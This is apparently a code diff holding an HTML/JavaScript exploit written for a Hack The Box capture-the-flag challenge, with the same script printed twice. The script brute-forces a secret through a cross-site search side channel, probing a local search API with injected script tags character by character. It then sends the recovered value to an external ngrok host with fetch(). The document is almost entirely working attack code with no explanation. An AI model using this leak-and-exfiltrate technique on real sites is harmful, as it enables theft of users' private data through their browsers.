scumdestroy · February 8, 2022 20:59
diff --git a/index.html b/index.html
 <html>
 <script>
 var local_ip = '127.0.0.1:1337';
 var url = "http://${local_ip}/api/entries/search?q="
 var ngrok = '3b3b-2600-6c50-7b7f-4c50-e133-2ebe-33a2-360b.ngrok.io';
 var flag = 'HTB{';
 var char_list = '!@abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-' ;

 async function getChunck(char){
 	return new Promise((resolve, reject)=>{
 	const script = document.createElement ("script");
 	script.src = url+encodeURIComponent (flag+char) ;
 	script.onload = () => char==='}' ? reject(char):resolve(char);
 	script.onerror = () => reject(char);
 	document.head.appendChild(script);
 });
 }

 async function getFlag(chars) {

 var a = false;

 for(var i=0; i < chars.length; i++){

 await getChunck(chars[i]).then((res) => {flag=flag.concat(res); a = res==='x' ? true:false; i=0} , (res)=> { } );
 if(a) break;
 }

 fetch(`http://${ngrok}/flag=${flag}`, {method:'get'});
 };

 getFlag(char_list);
 </script>
 </html>
	<html>
	<script>
	var local_ip = '127.0.0.1:1337';
	var url = "http://${local_ip}/api/entries/search?q="
	var ngrok = '3b3b-2600-6c50-7b7f-4c50-e133-2ebe-33a2-360b.ngrok.io';
	var flag = 'HTB{';
	var char_list = '!@abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-' ;

	async function getChunck(char){
	return new Promise((resolve, reject)=>{
	const script = document.createElement ("script");
	script.src = url+encodeURIComponent (flag+char) ;
	script.onload = () => char==='}' ? reject(char):resolve(char);
	script.onerror = () => reject(char);
	document.head.appendChild(script);
	});
	}

	async function getFlag(chars) {

	var a = false;

	for(var i=0; i < chars.length; i++){

	await getChunck(chars[i]).then((res) => {flag=flag.concat(res); a = res==='x' ? true:false; i=0} , (res)=> { } );
	if(a) break;
	}

	fetch(`http://${ngrok}/flag=${flag}`, {method:'get'});
	};

	getFlag(char_list);
	</script>
	</html>
No results found